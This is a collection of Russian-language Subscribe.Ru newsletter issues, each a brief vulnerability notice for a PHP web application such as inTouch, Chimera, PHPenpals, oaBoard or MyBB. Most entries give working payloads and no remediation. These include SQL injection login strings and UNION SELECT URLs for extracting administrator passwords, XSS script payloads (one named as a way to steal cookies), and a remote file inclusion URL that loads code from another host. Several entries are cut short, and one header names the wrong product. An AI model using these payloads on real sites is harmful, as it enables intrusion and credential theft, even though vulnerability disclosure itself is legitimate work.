Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: inTouch ПО: inTouch Версия: 0.5.1 Alpha Описание: Уязвимость скрипт: intouch.lib.php Уязвимость находится в $user и позволяет выполнить SQL-инъекцию для получения пароля администратора. Обязательно: gpc_magic_quotes = off Пример: http://host/index.php username: a' or 'a'a'/* password: anypassword inTouch Рассылка создана и ведется при поддержке Информационной сети Пермского края . Subscribe.Ru Поддержка подписчиков Другие...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: Chimera Web Portal System ПО: Chimera Web Portal System Версия: 0.2 Описание: Уязвимость скрипт: linkcategory.php Уязвимость находится в $id и позволяет выполнить SQL-инъекцию для получения пароля администратора. Обязательно: gpc_magic_quotes = off Пример: http://host/chimera/linkcategory.php?id=9999%20union%20select%20admin_password%20from%20admin/* Chimera Web Portal System Рассылка создана и ведется при поддержке Инфор...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: phpBook ПО: phpBook Версия: 1.3.2 Описание: Уязвимость скрипт: index.php Уязвимость находится в $mail и позволяет выполнить произвольный PHP код. Пример:v В поле E-mail: qwe@ .com phpBook Рассылка создана и ведется при поддержке Информационной сети Пермского края . Subscribe.Ru Поддержка подписчиков Другие рассылки этой тематики Другие рассылки этого автора Подписан адрес: Код этой рассылки: comp.paper.supuser Архив рассы...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: PHPenpals ПО: PHPenpals Версия: 310704 Описание: Уязвимость скрипт: profile.php Уязвимость находится в $personalID и позволит провести SQl-инъекцию для получения пароля администратора. Ссылка: http://host/phpenpals/profile.php?personalID=999%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,password,14%20from%20admin/* PHPenpals Рассылка создана и ведется при поддержке Информационной сети Пермского края . Subscribe.Ru Поддерж...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: Chimpunk Guestbook ПО: Chimpunk Guestbook Версия: 1.4 Описание: Уязвимость скрипт: addentry.php Уязвимость находится в $homepage и позволит использовать произвольный код скрипта, который должен быть использован в окне гостевой книги. Используется для похищения cookie. Ссылка: http://somesite/guestbook/addentry.php В поле Homepage: > <script>alert(123);</script> Chimpunk Guestbook Рассылка создана и ведется при...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: oaBoard ПО: oaBoard Версия: 1.0 Описание: Уязвимость скрипт: forum.php Уязвимость находится в $inc и $inc_stat и позволит вполнить произвольнйы PHP код. Обязательно: register_globals = on Ссылка: http://host/oaboard_en/forum.php?inc=http://anotherhost/code.php oaBoard Рассылка создана и ведется при поддержке Информационной сети Пермского края . Subscribe.Ru Поддержка подписчиков Другие рассылки этой тематики Другие рассыл...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: VEGO Links Builder ПО: VEGO Links Builder Версия: 2.0 Описание: Уязвимость скрипт: login.php Уязвимость находится в $username и позволит ввести SQL-инъекцию. Обязательно: magic_quotes_gpc = off Ссылка: http://host/links/login.php username: a' or 'a'a'/* password: anypassword VEGO Links Builder Рассылка создана и ведется при поддержке Информационной сети Пермского края . Subscribe.Ru Поддержка подписчиков Другие рассылки э...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: WEGO Veb Forum ПО: WEGO Veb Forum Версия: 1.26 Описание: Уязвимости находятся в: php/functions.php php/functions_update.php php/functions_display.php Уязвимость находится в theme_id и позволит ввести SQL-инъекцию. Для получения административного имени пользователя: http://hostname/webforum/index.php? theme_id-1% 20union%20select% 201,2,name, 4,5%20from% 20vwf_users% 20where%20userid=1/* Для получения хеш пароля администра...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: Recruitment ПО: Recruitment О Recruitment: Recruitment Software - это бесплатный полностью основанный на веб-технологиях продукт. Улучшенное использование технологий администрации дает вам полный контроль над вашими рабочими листами. Продукт был проверен в нескольких институтах. Описание: По-умолчанию устанавливается разрешение на чтение MySQL базы данных любым пользователем. При модификации URL показывает нам XML файл с ...

Информационный Канал Subscribe.Ru Компьютер для продвинутых пользователей Содержание: TUGZip ПО: MyBB Версия: all Описание: Уязвимость находиться в printthread.php и позволяет провести XSS атаку. Например: <script language=javascript>document.write" a"lert'Security bug allows XSS Cross-site scripting hacking found by imei) );</script> MyBB Рассылка создана и ведется при поддержке Информационной сети Пермского края . Subscribe.Ru Поддержка подписчиков Другие рассылки этой тематики Другие рассылк...